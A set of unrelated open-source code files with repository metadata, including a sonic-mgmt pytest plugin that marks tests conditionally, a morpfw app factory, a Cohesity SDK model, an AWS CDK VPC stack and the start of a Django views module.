] | permissive | stephenxs/sonic-mgmt | 74a3662212a5ee5b2583a93fc17b43cdd5a2c0a0 | 85dd08e4d86884ff0031c75b99de3c67b5e24698 | refs/heads/master | 2023-08-15T17:48:52.537559 | 2023-05-19T03:10:08 | 2023-05-19T03:10:08 | 188,744,518 | 0 | 0 | NOASSERTION | 2021-09-17T03:06:51 | 2019-05-27T00:15:18 | Python | UTF-8 | Python | false | false | 23,816 | py | """Plugin for adding any mark to specified test cases based on conditions in a centralized file.
This plugin supports adding any mark to specified test cases based on conditions. All the information of test cases,
marks, and conditions can be specified in a centralized file.
"""
import json
import logging
import os
import re
import subprocess
import yaml
import glob
import pytest
from tests.common.testbed import TestbedInfo
from .issue import check_issues
logger = logging.getLogger(__name__)
DEFAULT_CONDITIONS_FILE = 'common/plugins/conditional_mark/tests_mark_conditions*.yaml'
ASIC_NAME_PATH = '/../../../../ansible/group_vars/sonic/variables'
def pytest_addoption(parser):
    """Register the command line options understood by the conditional mark
    plugin on the given pytest option parser."""
    option_specs = [
        (('--mark-conditions-files',),
         dict(action='append',
              dest='mark_conditions_files',
              default=[],
              help="Location of your own mark conditions file. If it is not specified, the default file will be used.")),
        (('--ignore-conditional-mark',),
         dict(action='store_true',
              dest='ignore_conditional_mark',
              default=False,
              help="Ignore the conditional mark plugin. No conditional mark will be added.")),
        (('--customize_inventory_file',),
         dict(action='store',
              dest='customize_inventory_file',
              default=False,
              help="Location of your custom inventory file. "
                   "If it is not specified, and inv_name not in testbed.csv, 'lab' will be used")),
        (('--dynamic_update_skip_reason',),
         dict(action='store_true',
              dest='dynamic_update_skip_reason',
              default=False,
              help="Dynamically update the skip reason based on the conditions, "
                   "by default it will not use the static reason specified in the mark conditions file")),
    ]
    # Register each option with exactly the same flags/kwargs as before.
    for flags, params in option_specs:
        parser.addoption(*flags, **params)
def load_conditions(session):
    """Load the content from mark conditions file

    Args:
        session (obj): The pytest session object.

    Returns:
        list: List of single-key dicts, one per top-level entry across all
            loaded conditions files. Fails the session when no file can be
            found or a file cannot be parsed.
    """
    conditions_list = list()

    # Bug fix: the original code removed glob patterns from the list while
    # iterating over that same list, which skips the element following each
    # removed pattern (e.g. the second of two consecutive glob patterns was
    # never expanded). Build a new expanded list instead; this also avoids
    # mutating the option value stored on the pytest config object.
    expanded_files = []
    for pattern in session.config.option.mark_conditions_files:
        if '*' in pattern:
            for matched_file in glob.glob(pattern):
                if matched_file not in expanded_files:
                    expanded_files.append(matched_file)
        else:
            expanded_files.append(pattern)
    conditions_files = expanded_files

    if not conditions_files:
        conditions_files = glob.glob(DEFAULT_CONDITIONS_FILE)

    # Silently drop paths that do not exist on disk.
    conditions_files = [f for f in conditions_files if os.path.exists(f)]
    if not conditions_files:
        pytest.fail('There is no conditions files')

    try:
        logger.debug('Trying to load test mark conditions files: {}'.format(conditions_files))
        for conditions_file in conditions_files:
            with open(conditions_file) as f:
                logger.debug('Loaded test mark conditions file: {}'.format(conditions_file))
                conditions = yaml.safe_load(f)
                # Keep each top-level entry as its own single-key dict so the
                # per-file ordering of entries is preserved in the result.
                for key, value in list(conditions.items()):
                    conditions_list.append({key: value})
    except Exception as e:
        logger.error('Failed to load {}, exception: {}'.format(conditions_files, repr(e)), exc_info=True)
        pytest.fail('Loading conditions file "{}" failed. Possibly invalid yaml file.'.format(conditions_files))

    return conditions_list
def read_asic_name(hwsku):
    """Map a DUT hwsku to its ASIC generation name.

    Reads 'ansible/group_vars/sonic/variables' and searches the entries
    whose keys contain 'td', 'th' or 'spc' for the given hwsku.

    Args:
        hwsku (str): Dut hwsku name

    Returns:
        str or None: The ASIC generation (second '_'-separated token of the
            matching key), 'unknown' when the hwsku is not listed, or None
            when the variables file cannot be read.
    """
    variables_file = os.path.dirname(__file__) + ASIC_NAME_PATH
    try:
        with open(variables_file) as f:
            platform_map = yaml.safe_load(f)
        # Only the keys naming an ASIC family are relevant here.
        relevant_entries = {key: hwskus for key, hwskus in platform_map.items()
                            if 'td' in key or 'th' in key or 'spc' in key}
        for family_key, hwskus in relevant_entries.items():
            if hwsku in hwskus:
                return family_key.split('_')[1]
        return "unknown"
    except IOError:
        return None
def load_dut_basic_facts(inv_name, dut_name):
    """Run 'ansible -m dut_basic_facts' command to get some basic DUT facts.

    The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.

    Args:
        inv_name (str): The name of inventory.
        dut_name (str): The name of dut.

    Returns:
        dict: The dut basic facts; empty when the ansible call failed.
    """
    results = {}
    logger.info('Getting dut basic facts')
    try:
        inv_full_path = os.path.join(os.path.dirname(__file__), '../../../../ansible', inv_name)
        ansible_cmd = 'ansible -m dut_basic_facts -i {} {} -o'.format(inv_full_path, dut_name)

        raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
        logger.debug('raw dut basic facts:\n{}'.format(raw_output))
        # Everything after the 'SUCCESS =>' marker is the JSON facts payload.
        output_fields = raw_output.split('SUCCESS =>', 1)
        if len(output_fields) >= 2:
            results.update(json.loads(output_fields[1].strip())['ansible_facts']['dut_basic_facts'])
            # Derive the ASIC generation from the reported hwsku.
            results['asic_gen'] = read_asic_name(results['hwsku'])
    except Exception as e:
        # Best effort: callers get an empty dict when the ansible call fails.
        logger.error('Failed to load dut basic facts, exception: {}'.format(repr(e)))

    return results
def get_basic_facts(session):
    """Populate the pytest cache with basic facts, refreshing them whenever
    the configured testbed name differs from the cached one."""
    cache = session.config.cache
    current_tb_name = session.config.option.testbed
    cached_tb_name = cache.get('TB_NAME', None)
    cached_facts = cache.get('BASIC_FACTS', None)
    if cached_tb_name != current_tb_name:
        # Invalidate entries belonging to a different testbed first.
        cache.set('TB_NAME', None)
        cache.set('BASIC_FACTS', None)
        fresh_facts = load_basic_facts(session)
        cache.set('TB_NAME', current_tb_name)
        cache.set('BASIC_FACTS', fresh_facts)
    elif not cached_facts:
        # Same testbed, but the facts were never cached (or were cleared).
        cache.set('BASIC_FACTS', load_basic_facts(session))
def load_minigraph_facts(inv_name, dut_name):
    """Run 'ansible -m minigraph_facts -a host={{hostname}}' command to get some basic minigraph facts.

    The facts will be a 1 level dictionary. The dict keys can be used as variables in condition statements evaluation.

    Args:
        inv_name (str): The name of inventory.
        dut_name (str): The name of dut.

    Returns:
        dict: Selected minigraph facts; empty when the ansible call failed.
    """
    results = {}
    logger.info('Getting minigraph basic facts')
    try:
        # get minigraph basic facts
        ansible_cmd = "ansible -m minigraph_facts -i ../ansible/{0} {1} -a host={1}".format(inv_name, dut_name)

        raw_output = subprocess.check_output(ansible_cmd.split()).decode('utf-8')
        logger.debug('raw minigraph basic facts:\n{}'.format(raw_output))
        # Everything after the 'SUCCESS =>' marker is the JSON facts payload.
        output_fields = raw_output.split('SUCCESS =>', 1)
        if len(output_fields) >= 2:
            output_fields = json.loads(output_fields[1].strip())['ansible_facts']
            # Only a subset of minigraph facts is exposed for condition evaluation.
            results['minigraph_interfaces'] = output_fields['minigraph_interfaces']
            results['minigraph_portchannels'] = output_fields['minigraph_portchannels']
            results['minigraph_portchannel_interfaces'] = output_fields['minigraph_portchannel_interfaces']
            results['minigraph_neighbors'] = output_fields['minigraph_neighbors']
    except Exception as e:
        # Best effort: callers get an empty dict when the ansible call fails.
        logger.error('Failed to load minigraph basic facts, exception: {}'.format(repr(e)))

    return results
def load_config_facts(inv_name, dut_name):
    """Collect a subset of persistent config facts from the DUT via ansible.

    Runs the ``config_facts`` ansible module with ``source='persistent'``
    and keeps a few VOQ-chassis related sections.

    Args:
        inv_name (str): The name of inventory.
        dut_name (str): The name of dut.

    Returns:
        dict: Selected config facts; empty dict if anything went wrong.
    """
    facts = {}
    logger.info('Getting config basic facts')
    try:
        # Built as a list (not a split string) because the module argument
        # contains quoted content.
        cmd = ['ansible', '-m', 'config_facts', '-i', '../ansible/{}'.format(inv_name),
               '{}'.format(dut_name), '-a', 'host={} source=\'persistent\''.format(dut_name)]
        stdout = subprocess.check_output(cmd).decode('utf-8')
        logger.debug('raw config basic facts:\n{}'.format(stdout))
        chunks = stdout.split('SUCCESS =>', 1)
        if len(chunks) >= 2:
            parsed = json.loads(chunks[1].strip())['ansible_facts']
            for key in ('VOQ_INBAND_INTERFACE', 'BGP_VOQ_CHASSIS_NEIGHBOR', 'INTERFACE'):
                facts[key] = parsed.get(key, {})
    except Exception as e:
        logger.error('Failed to load config basic facts, exception: {}'.format(repr(e)))
    return facts
def load_switch_capabilities_facts(inv_name, dut_name):
    """Collect switch capability facts from the DUT via ansible.

    Args:
        inv_name (str): The name of inventory.
        dut_name (str): The name of dut.

    Returns:
        dict: ``{'switch': ...}`` facts; empty dict if anything went wrong.
    """
    facts = {}
    logger.info('Getting switch capabilities basic facts')
    try:
        cmd = "ansible -m switch_capabilities_facts -i ../ansible/{} {}".format(inv_name, dut_name)
        stdout = subprocess.check_output(cmd.split()).decode('utf-8')
        logger.debug('raw switch capabilities basic facts:\n{}'.format(stdout))
        chunks = stdout.split('SUCCESS =>', 1)
        if len(chunks) >= 2:
            parsed = json.loads(chunks[1].strip())['ansible_facts']['switch_capabilities']
            facts['switch'] = parsed.get('switch', {})
    except Exception as e:
        logger.error('Failed to load switch capabilities basic facts, exception: {}'.format(repr(e)))
    return facts
def load_console_facts(inv_name, dut_name):
    """Collect console facts from the DUT via ansible.

    Args:
        inv_name (str): The name of inventory.
        dut_name (str): The name of dut.

    Returns:
        dict: The ``console_facts`` dict; empty dict if anything went wrong.
    """
    facts = {}
    logger.info('Getting console basic facts')
    try:
        cmd = "ansible -m console_facts -i ../ansible/{} {}".format(inv_name, dut_name)
        stdout = subprocess.check_output(cmd.split()).decode('utf-8')
        logger.debug('raw console basic facts:\n{}'.format(stdout))
        chunks = stdout.split('SUCCESS =>', 1)
        if len(chunks) >= 2:
            # Unlike the other loaders, the whole console_facts dict is kept.
            facts = json.loads(chunks[1].strip())['ansible_facts']['console_facts']
    except Exception as e:
        logger.error('Failed to load console basic facts, exception: {}'.format(repr(e)))
    return facts
def load_basic_facts(session):
    """Load some basic facts that can be used in condition statement evaluation.

    The facts will be a 1 level dictionary. The dict keys can be used as
    variables in condition statements evaluation.

    Args:
        session (obj): Pytest session object.

    Returns:
        dict: Dict of facts.
    """
    results = {}

    testbed_name = session.config.option.testbed
    testbed_file = session.config.option.testbed_file

    tbinfo = TestbedInfo(testbed_file).testbed_topo.get(testbed_name, None)
    results['topo_type'] = tbinfo['topo']['type']
    results['topo_name'] = tbinfo['topo']['name']
    results['testbed'] = testbed_name

    # All ansible-based facts are collected from the first DUT of the testbed.
    dut_name = tbinfo['duts'][0]
    if session.config.option.customize_inventory_file:
        inv_name = session.config.option.customize_inventory_file
    elif 'inv_name' in list(tbinfo.keys()):
        inv_name = tbinfo['inv_name']
    else:
        inv_name = 'lab'

    # Since internal repo add vendor test support, add check to see if it's
    # sonic-os, otherwise skip loading facts.
    vendor = session.config.getoption("--dut_vendor", "sonic")
    if vendor == "sonic":
        # Bug fix: the console facts were previously loaded with
        # load_config_facts (copy/paste error), so console facts never made
        # it into the results. Run every loader and merge non-empty results.
        for loader in (load_dut_basic_facts,
                       load_minigraph_facts,
                       load_config_facts,
                       load_switch_capabilities_facts,
                       load_console_facts):
            _facts = loader(inv_name, dut_name)
            if _facts:
                results.update(_facts)

    # Load possible other facts here
    return results
def find_longest_matches(nodeid, conditions):
    """Find the longest matches of the given test case name in the conditions list.

    This is similar to longest prefix match in routing table. The longest
    match takes precedence.

    Args:
        nodeid (str): Full test case name
        conditions (list): List of conditions (each a one-item dict keyed by
            a test-name prefix)

    Returns:
        list: All condition entries whose key is the longest matching prefix
            of ``nodeid``; empty list if nothing matches.
    """
    longest_matches = []
    max_length = -1
    for condition in conditions:
        # condition is a dict which has only one item, so we use
        # list(condition.keys())[0] to get its key.
        prefix = list(condition.keys())[0]
        if nodeid.startswith(prefix):
            # Bug fix: compare the length of the matched prefix. The previous
            # code used len(condition), which is always 1 for a one-item dict
            # and therefore defeated the longest-prefix-match semantics.
            length = len(prefix)
            if length > max_length:
                max_length = length
                longest_matches = [condition]
            elif length == max_length:
                longest_matches.append(condition)
    return longest_matches
def update_issue_status(condition_str, session):
    """Replace each issue URL in a condition with 'True' or 'False'.

    The replacement reflects whether the referenced issue (GitHub, Jira,
    Redmine, ...) is still active; lookup results are memoized in the
    pytest cache under 'ISSUE_STATUS'.

    Args:
        condition_str (str): Condition string that may contain issue URLs.
        session (obj): Pytest session object, for getting cached data.

    Returns:
        str: Condition string with issue URLs replaced by 'True'/'False'.
    """
    found_urls = re.findall('https?://[^ )]+', condition_str)
    if not found_urls:
        logger.debug('No issue specified in condition')
        return condition_str

    status_cache = session.config.cache.get('ISSUE_STATUS', {})

    # Query only the issues we have not seen before, then refresh the cache.
    uncached = [url for url in found_urls if url not in status_cache]
    if uncached:
        status_cache.update(check_issues(uncached))
        session.config.cache.set('ISSUE_STATUS', status_cache)

    for url in found_urls:
        # An issue whose state could not be determined is treated as active.
        state = str(status_cache[url]) if url in status_cache else 'True'
        condition_str = condition_str.replace(url, state)
    return condition_str
def evaluate_condition(dynamic_update_skip_reason, mark_details, condition, basic_facts, session):
    """Evaluate one condition string against the supplied basic facts.

    Issue URLs in the condition are first resolved to 'True'/'False' via
    update_issue_status(). When the condition holds and
    dynamic_update_skip_reason is set, the raw condition text is appended
    to mark_details['reason'].

    Args:
        dynamic_update_skip_reason (bool): Record matching conditions as reasons.
        mark_details (dict): Mark detail info from the mark conditions file.
        condition (str): Raw condition string, evaluated with python eval().
        basic_facts (dict): Variables available during evaluation.
        session (obj): Pytest session object, for getting cached data.

    Returns:
        bool: Evaluation result; False when evaluation raises.
    """
    if condition is None or not condition.strip():
        # An empty condition item is evaluated as True, i.e. it is ignored.
        return True

    resolved = update_issue_status(condition, session)
    try:
        verdict = bool(eval(resolved, basic_facts))
        if verdict and dynamic_update_skip_reason:
            mark_details['reason'].append(condition)
        return verdict
    except Exception:
        logger.error('Failed to evaluate condition, raw_condition={}, condition_str={}'.format(
            condition,
            resolved))
        return False
def evaluate_conditions(dynamic_update_skip_reason, mark_details, conditions, basic_facts,
                        conditions_logical_operator, session):
    """Evaluate a single condition or a list of conditions.

    A list is combined with AND or OR according to
    conditions_logical_operator (default 'AND'). Every list entry is always
    evaluated (no short-circuit) so that all matching reasons get recorded.

    Args:
        dynamic_update_skip_reason (bool): Record matching conditions as reasons.
        mark_details (dict): Mark detail info from the mark conditions file.
        conditions (str or list): Condition string or list of condition strings.
        basic_facts (dict): Variables available during evaluation.
        conditions_logical_operator (str): 'AND' or 'OR'.
        session (obj): Pytest session object, for getting cached data.

    Returns:
        bool: Combined evaluation result.
    """
    if dynamic_update_skip_reason:
        # Reset the recorded reasons; evaluate_condition appends to this list.
        mark_details['reason'] = []
    if isinstance(conditions, list):
        # Evaluate all entries eagerly so every true condition is recorded.
        verdicts = [evaluate_condition(dynamic_update_skip_reason, mark_details, entry,
                                       basic_facts, session)
                    for entry in conditions]
        combine = any if conditions_logical_operator == 'OR' else all
        return combine(verdicts)
    if conditions is None or not conditions.strip():
        return True
    return evaluate_condition(dynamic_update_skip_reason, mark_details, conditions, basic_facts, session)
def pytest_collection(session):
    """Hook for loading conditions and basic facts.

    The pytest session.config.cache is used for caching loaded conditions
    and basic facts for later use.

    Args:
        session (obj): Pytest session object.
    """
    # Always clear cached conditions of previous run.
    session.config.cache.set('TESTS_MARK_CONDITIONS', None)

    if session.config.option.ignore_conditional_mark:
        logger.info('Ignore conditional mark')
        return

    conditions = load_conditions(session)
    if not conditions:
        return
    session.config.cache.set('TESTS_MARK_CONDITIONS', conditions)
    # Only load basic facts if conditions are defined.
    get_basic_facts(session)
def pytest_collection_modifyitems(session, config, items):
    """Hook for adding marks to test cases based on conditions defined in a centralized file.

    For every collected item the longest matching condition entries are
    looked up; each mark they describe is added when its conditions evaluate
    to true (or unconditionally when no conditions are given).

    Args:
        session (obj): Pytest session object.
        config (obj): Pytest config object.
        items (obj): List of pytest Item objects.
    """
    # Both values were cached by pytest_collection(); bail out when either
    # is missing (conditional marking disabled or no conditions defined).
    conditions = config.cache.get('TESTS_MARK_CONDITIONS', None)
    if not conditions:
        logger.debug('No mark condition is defined')
        return
    basic_facts = config.cache.get('BASIC_FACTS', None)
    if not basic_facts:
        logger.debug('No basic facts')
        return
    logger.info('Available basic facts that can be used in conditional skip:\n{}'.format(
        json.dumps(basic_facts, indent=2)))
    dynamic_update_skip_reason = session.config.option.dynamic_update_skip_reason
    for item in items:
        longest_matches = find_longest_matches(item.nodeid, conditions)
        if longest_matches:
            logger.debug('Found match "{}" for test case "{}"'.format(longest_matches, item.nodeid))
            for match in longest_matches:
                # match is a dict which has only one item, so we use match.values()[0] to get its value.
                for mark_name, mark_details in list(list(match.values())[0].items()):
                    # NOTE(review): mark_details.get is called before the
                    # `if not mark_details` check below; a None mark_details
                    # (empty YAML value) would raise AttributeError here --
                    # confirm whether the conditions file guarantees a dict.
                    conditions_logical_operator = mark_details.get('conditions_logical_operator', 'AND').upper()
                    add_mark = False
                    if not mark_details:
                        add_mark = True
                    else:
                        mark_conditions = mark_details.get('conditions', None)
                        if not mark_conditions:
                            # Unconditionally add mark
                            add_mark = True
                        else:
                            add_mark = evaluate_conditions(dynamic_update_skip_reason, mark_details, mark_conditions,
                                                           basic_facts, conditions_logical_operator, session)
                    if add_mark:
                        reason = ''
                        if mark_details:
                            reason = mark_details.get('reason', '')
                            # A list of reasons (from dynamic skip-reason mode)
                            # is joined to mirror the logical operator used.
                            if isinstance(reason, list):
                                if conditions_logical_operator == "AND":
                                    reason = " and\n".join(reason)
                                else:
                                    reason = " or\n".join(reason)
                        if mark_name == 'xfail':
                            strict = False
                            if mark_details:
                                strict = mark_details.get('strict', False)
                            mark = getattr(pytest.mark, mark_name)(reason=reason, strict=strict)
                            # To generate xfail property in the report xml file
                            item.user_properties.append(('xfail', strict))
                        else:
                            mark = getattr(pytest.mark, mark_name)(reason=reason)
                        logger.debug('Adding mark {} to {}'.format(mark, item.nodeid))
                        item.add_marker(mark)
| [
"noreply@github.com"
] | stephenxs.noreply@github.com |
a8313acf22c9a36cb5066ecbeff2d5ab7d53015b | 5203d58b0e00caff0f716c68549072dabfc99fe2 | /specs/dev/swift_nrpe/simple_nonha/scale_out_swift_proxy.py | 0f3e1e9ef2bf11cb3d8ac8f8e49be673d3ab2b07 | [] | no_license | openstack-charmers/openstack-mojo-specs | 800a87280a55313bca7aec6dedc72b6097cad91f | c2224c595b0a264f24b145938ca2734c14dbbea6 | refs/heads/master | 2021-10-09T03:43:00.063224 | 2021-10-08T14:20:23 | 2021-10-08T14:20:23 | 126,203,312 | 3 | 9 | null | 2021-10-08T14:20:23 | 2018-03-21T15:50:04 | Python | UTF-8 | Python | false | false | 49 | py | ../../../../helper/setup/scale_out_swift_proxy.py | [
"liam.young@canonical.com"
] | liam.young@canonical.com |
eb0d0e43a90927231bac66479c5d230cec59cd25 | 29e2afe487acefdc17ae4b16def495632d479be3 | /morpfw/crud/__init__.py | d38eadc21aafd253567055f77b655f7f0266a68c | [] | no_license | brainysmurf/morpfw | fd2a40b660bef00b9cc0a142cbfdcb8d37620f2b | a8d5e3fa57a8d66b61840f113ba54f6c1fcf60d0 | refs/heads/master | 2020-04-10T08:26:20.123425 | 2018-12-07T09:59:43 | 2018-12-07T09:59:43 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,510 | py | import morepath
from .app import App
from . import subscribers
from .app import Session
import argparse
import yaml
import sqlalchemy
import os
from .model import Collection, Model
from .rulesadapter import Adapter
from .schema import Schema
from .model import StateMachine
from .util import resolve_model
from .app import App
from .storage.sqlstorage import SQLStorage
from zope.sqlalchemy import register as register_session
def run():
    """CLI entry point: load a YAML settings file and serve the application.

    Parses ``-s/--settings`` (default ``settings.yml``), builds the app via
    ``create_app`` and hands it to ``morepath.run``.
    """
    parser = argparse.ArgumentParser()
    parser.add_argument('-s', '--settings', default='settings.yml')
    args = parser.parse_args()
    with open(args.settings) as cf:
        # NOTE(review): yaml.load without an explicit Loader is unsafe on
        # untrusted input (and deprecated in newer PyYAML); consider
        # yaml.safe_load if the settings file is not fully trusted.
        settings = yaml.load(cf)
    application = create_app(App, settings)
    # start app
    morepath.run(application)
def create_app(app, settings, sqlalchemy_session=Session,
               sqlalchemy_bases=None):
    """Configure and instantiate a Morepath application.

    Args:
        app: Morepath App class to configure and instantiate.
        settings (dict): Application settings. An optional ``sqlalchemy``
            section with a ``dburi`` key (supports ``%(here)s`` for the
            current working directory) enables database setup.
        sqlalchemy_session: Session factory to register and bind to the engine.
        sqlalchemy_bases (list): Declarative bases whose tables get created.

    Returns:
        The instantiated application object.
    """
    sqlalchemy_bases = sqlalchemy_bases or []
    register_session(sqlalchemy_session)
    # initialize SQLAlchemy
    if 'sqlalchemy' in settings:
        cwd = os.getcwd()
        engine = sqlalchemy.create_engine(
            settings['sqlalchemy']['dburi'] % {'here': cwd})
        sqlalchemy_session.configure(bind=engine)
    # initialize app
    app.init_settings(settings)
    morepath.commit(app)
    morepath.autoscan()
    app.commit()
    application = app()
    # create tables (only meaningful when an engine was configured above)
    if 'sqlalchemy' in settings:
        for base in sqlalchemy_bases:
            base.metadata.create_all(engine)
    return application
# Allow running this module directly as a script.
if __name__ == '__main__':
    run()
| [
"kagesenshi.87@gmail.com"
] | kagesenshi.87@gmail.com |
dde7bfd72a9c08bfffad33758d1137ddd7fa93d0 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_53/501.py | a8f69f0a69a63542706fc8e3cfa8c19f65f8686a | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 286 | py | # -*- coding: utf-8 -*-
import sys
fin = sys.stdin
T = int(fin.readline())
for case in range(1,T+1):
(N,k) = map(int, fin.readline().split())
m = pow(2,N)
#print m
if (k+1) % m == 0:
print "Case #%d: ON" % (case)
else:
print "Case #%d: OFF" % (case)
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
41106cde601cc1c35e636198ff7b8dd1a03de755 | 09f8a3825c5109a6cec94ae34ea17d9ace66f381 | /cohesity_management_sdk/models/couchbase_cluster.py | bfa8f347c5dc05f02dbd954e2bd179bc7848972b | [
"Apache-2.0"
] | permissive | cohesity/management-sdk-python | 103ee07b2f047da69d7b1edfae39d218295d1747 | e4973dfeb836266904d0369ea845513c7acf261e | refs/heads/master | 2023-08-04T06:30:37.551358 | 2023-07-19T12:02:12 | 2023-07-19T12:02:12 | 134,367,879 | 24 | 20 | Apache-2.0 | 2023-08-31T04:37:28 | 2018-05-22T06:04:19 | Python | UTF-8 | Python | false | false | 1,325 | py | # -*- coding: utf-8 -*-
# Copyright 2023 Cohesity Inc.
class CouchbaseCluster(object):

    """Implementation of the 'CouchbaseCluster' model.

    Specifies an Object containing information about a couchbase cluster.

    Attributes:
        seeds (list of string): Seeds of this Couchbase Cluster.

    """

    # Maps Python attribute names to the property names used by the API.
    _names = {
        "seeds": 'seeds',
    }

    def __init__(self, seeds=None):
        """Constructor for the CouchbaseCluster class"""
        # Seed nodes of the cluster, or None when not provided.
        self.seeds = seeds

    @classmethod
    def from_dictionary(cls, dictionary):
        """Creates an instance of this model from a dictionary.

        Args:
            dictionary (dict): A dictionary representation of the object as
                obtained from the deserialization of the server's response.
                The keys MUST match property names in the API description.

        Returns:
            object: An instance of this class, or None for a None input.
        """
        if dictionary is None:
            return None
        return cls(dictionary.get("seeds"))
"naveena.maplelabs@cohesity.com"
] | naveena.maplelabs@cohesity.com |
c7c44980d93edb211bcc3294467a393395be5804 | f4912e5b302f9a9fe013a7ddefe18a599fd1715d | /app_stacks/vpc_stack.py | a595a79091241b7a77efb093e5fcf86043fcc5b0 | [] | no_license | miztiik/xray-lambda-profiler | 5c49d9e4ffcd116fc76f9a7cf5c4c7e0ea9cc45a | 5f7add49d832899e01dd54b72c1478efa9f6853f | refs/heads/master | 2021-04-11T17:07:45.722949 | 2020-08-30T13:06:14 | 2020-08-30T13:06:14 | 249,039,624 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,634 | py | from aws_cdk import aws_ec2 as _ec2
from aws_cdk import core
class global_args:
    '''
    Helper to define global statics
    '''
    # Tag/metadata values shared by the stacks in this CDK app.
    OWNER = 'MystiqueAutomation'
    ENVIRONMENT = 'production'
    REPO_NAME = 'xray-lambda-profiler'
    # Source repository URL advertised in the stack outputs.
    SOURCE_INFO = f'https://github.com/miztiik/{REPO_NAME}'
    VERSION = '2020_03_21'
class VpcStack(core.Stack):
    """CDK stack that provides a VPC: imported by name, or newly created."""

    def __init__(self, scope: core.Construct, id: str, from_vpc_name=None, ** kwargs) -> None:
        """Create or import the VPC exposed as ``self.vpc``.

        Args:
            scope: Parent CDK construct.
            id: Logical id of this stack.
            from_vpc_name: When given, look up an existing VPC by name
                instead of provisioning a new one.
        """
        super().__init__(scope, id, **kwargs)
        if from_vpc_name is not None:
            # Import an already-existing VPC instead of provisioning one.
            self.vpc = _ec2.Vpc.from_lookup(
                self, "vpc",
                vpc_name=from_vpc_name
            )
        else:
            # New VPC across 2 AZs, no NAT gateways; a public and an
            # isolated ("db") subnet per AZ. The private "app" tier is
            # intentionally commented out.
            self.vpc = _ec2.Vpc(
                self,
                "miztVpc",
                cidr="10.10.0.0/16",
                max_azs=2,
                nat_gateways=0,
                subnet_configuration=[
                    _ec2.SubnetConfiguration(
                        name="public", cidr_mask=24, subnet_type=_ec2.SubnetType.PUBLIC
                    ),
                    # _ec2.SubnetConfiguration(
                    #     name="app", cidr_mask=24, subnet_type=_ec2.SubnetType.PRIVATE
                    # ),
                    _ec2.SubnetConfiguration(
                        name="db", cidr_mask=24, subnet_type=_ec2.SubnetType.ISOLATED
                    )
                ]
            )
        # CloudFormation output pointing at the source repository.
        output_0 = core.CfnOutput(
            self,
            "AutomationFrom",
            value=f"{global_args.SOURCE_INFO}",
            description="To know more about this automation stack, check out our github page."
        )
| [
"13oct08@quantumfoam.uni.cc"
] | 13oct08@quantumfoam.uni.cc |
c5356e8a8533dcf0eb957bc66cfbfc82385a9321 | 05b418ec539a1df81e7b356cac33bb96fcb26b5c | /CroPy/plants.py | 127d89b3147314a4d622f55c51df5aeea8c27ac3 | [] | no_license | rjcmarkelz/CroPy | 7aff37797936b9ca676facbe9eb3bd7ea6443c09 | cc18da80ea3431783b074053f3183debc31043ba | refs/heads/master | 2021-01-10T05:10:10.677352 | 2016-01-04T05:33:34 | 2016-01-04T05:33:34 | 46,379,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,377 | py | class Plant(object):
def __init__(self):
self._observers = []
def attach(self, observer):
if observer not in self._observers:
self._observers.append(observer)
def notify(self, modifier=None):
for observer in self._observers:
if modifier != observer:
observer.update(self)
class Organ(Plant):
    """Plant organ with observable carbon, length and photo properties.

    Every property setter notifies the attached observers via
    ``Plant.notify``.
    """

    def __init__(self, name=''):
        Plant.__init__(self)
        self.name = name
        # Backing fields for the observable properties (initial state).
        self._carbon = 10
        self._length = 10
        self._photo = 3

    @property
    def carbon(self):
        """Carbon amount; setting it notifies all observers."""
        return self._carbon

    @carbon.setter
    def carbon(self, value):
        self._carbon = value
        self.notify()

    @property
    def length(self):
        """Organ length; setting it notifies all observers."""
        return self._length

    @length.setter
    def length(self, value):
        self._length = value
        self.notify()

    @property
    def photo(self):
        """Photosynthesis value; setting it notifies all observers."""
        return self._photo

    @photo.setter
    def photo(self, value):
        self._photo = value
        self.notify()
class CarbView:
    """Observer that prints a plant's state whenever it is notified."""

    def __init__(self, name=''):
        self.name = name

    def update(self, plant):
        """Dump the observed plant's attributes to stdout."""
        for attr in ('carbon', 'length', 'photo'):
            print('%s has %d %s' % (plant.name, getattr(plant, attr), attr))
        print(plant.length * plant.photo)
| [
"rjmarkelz@ucdavis.edu"
] | rjmarkelz@ucdavis.edu |
cf95d8797fffba43060c2f90f9dc5f76f00f38e7 | b07a69b7a82f4bd22501908501b4b6ff3c1f2a94 | /week15_and_onwards/MySite/mysite/mysite/views.py | 16156c186c2c57064ddb40e566f3e00ad26b857f | [] | no_license | PetosPy/hackbulgaria_python | 8c1103ceefc4f832c42996a86fb351bfc951797c | d7212f35cd448e55009141bd6e42b55f7f05779b | refs/heads/master | 2023-02-28T16:40:22.828545 | 2017-02-15T15:06:28 | 2017-02-15T15:06:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,694 | py | from math import factorial
from django.shortcuts import render, redirect
from django.http import HttpRequest, HttpResponse
from mysite.utils.rle_compressor import compress, decompress
from mysite.utils.calculator import get_nth_fibonacci_numbers, get_nth_prime_numbers, gen_primes
def get_index(request: HttpRequest):
    """Render the index page with the current session as template context."""
    return render(request, 'index.html', request.session)
# @/calculateNFactorial
def calc_n_factorial(request: HttpRequest):
    """Compute n! for the posted 'n_fac' value and store it in the session.

    On bad input an 'error_msg' is stored instead. Always redirects back to
    the index page.
    """
    n = request.POST.get('n_fac', '')
    try:
        n = int(n)
        if n < 0:
            # math.factorial raises ValueError for negatives, which the
            # generic handler below would mislabel as "not a valid integer".
            # Report a precise message instead (consistent with the
            # positivity checks in the sibling views).
            request.session['error_msg'] = 'The input must be a non-negative integer!'
            return redirect('index')
        request.session['wanted_n_fac'] = n
        request.session['n_factorial'] = factorial(n)
    except ValueError:
        request.session['error_msg'] = 'The input must be a valid integer!'
    return redirect('index')
# @/calculateNthFibonacci
def calc_nth_fibonacci_numbers(request: HttpRequest):
